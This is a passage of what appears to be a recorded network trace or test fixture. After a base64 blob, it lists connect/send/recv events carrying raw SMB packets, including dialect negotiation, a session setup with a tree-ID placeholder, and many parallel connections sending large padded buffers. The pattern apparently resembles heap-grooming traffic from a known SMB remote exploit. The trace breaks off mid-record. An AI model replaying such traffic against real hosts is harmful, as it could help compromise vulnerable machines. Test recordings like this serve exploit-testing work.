cnbMdnSFxH6O6JpVxcN/FxvKXQoxIpoBFqcm/xl4fYkpUvqY9rq/92UORbBCPT3CCbWhOP3gJNl1GH8oSuHG7m2bygsKB67Hqk8JKuGzdpGygu00Q/Ytbttzk8rBIdBFi6Tj9GNf4KCdOsOFkl1IiF4mb7bjOLofP5/dBz85pDAIn5VuMi3JB5DcjnBoMITtM7sVuzeT8/uVzDtL+yzz/OqiO4bl9H+BGcrGG5jnlqLgI1dh1thymLio0OwifPa9oIXKscPKcgLGp9kxJ+w89y5JNC3fMvFTAwBmsmMZ1tiwRGNCwRCqI9G/aTX5sjOncf4Z5sobirIT26Cxovw88M/EcTA3cPoHbzwvMa94Bv0O+MCp4e+Nz9c4hcLSLxcj4yVDHO+on/Yx4rhnglhrZNsZQxIKC0BmUd8WQ8tL/8aNRqHuKEcgvcIRwFKrvGE8DjAvrxvUGxt/B9X6TQ+pRpD0ENlpV2yVqFqeJvInYgOguNQs9XTlteOjTLZX5tU97X/JoaVMN8zwAkgTjpIAKN4NQoXD670XEgTNsF7GswgsMIfDXDvTudKaon\\\\x00\\\\x00\\\\x001\\\\xffSMB+\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00__TREEID__PLACEHOLDER__\\\\xff\\\\[email\u00a0protected]\\\\x00\\\\x01\\\\x01\\\\x00\\\\x0c\\\\x00JlJmIhClBsr\\\\x00', 0.0)\", \"('recv', 1, 0.0)\", \"('connect', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('send', 2, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\x07\\\\xc0\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00-\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf0\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 2, 0.0)\", \"('connect', 3, 0.0)\", \"('connect', 4, 0.0)\", \"('send', 3, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 5, 0.0)\", \"('send', 4, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 6, 0.0)\", \"('send', 6, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 7, 0.0)\", \"('connect', 8, 0.0)\", \"('send', 7, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 8, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 9, 0.0)\", \"('connect', 10, 0.0)\", \"('send', 9, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 10, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 11, 0.0)\", \"('connect', 12, 0.0)\", \"('send', 11, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 13, 0.0)\", \"('send', 12, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 14, 0.0)\", \"('send', 13, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 15, 0.0)\", \"('send', 14, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 16, 0.0)\", \"('send', 15, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00\\\\x85\\\\xffSMBr\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18S\\\\xc8\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x00b\\\\x00\\\\x02PC NETWORK PROGRAM 1.0\\\\x00\\\\x02LANMAN1.0\\\\x00\\\\x02Windows for Workgroups 3.1a\\\\x00\\\\x02LM1.2X002\\\\x00\\\\x02LANMAN2.1\\\\x00\\\\x02NT LM 0.12\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('send', 16, b'\\\\x00\\\\x00\\\\x00Q\\\\xffSMBs\\\\x00\\\\x00\\\\x00\\\\x00\\\\x18\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xff\\\\xfe\\\\x00\\\\[email\u00a0protected]\\\\x00\\\\x0c\\\\xff\\\\x00\\\\x00\\\\x00\\\\x04\\\\x11\\\\n\\\\x00,\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x80\\\\x16\\\\x00\\\\xf8\\\\x87\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('recv', 16, 0.0)\", \"('close', 2, 0.0)\", \"('connect', 17, 0.0)\", \"('send', 17, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 18, 0.0)\", \"('connect', 19, 0.0)\", \"('send', 18, b'\\\\x00\\\\x00\\\\xff\\\\xf7\\\\xfeSMB\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('connect', 20, 0.0)\", \"('send', 19, 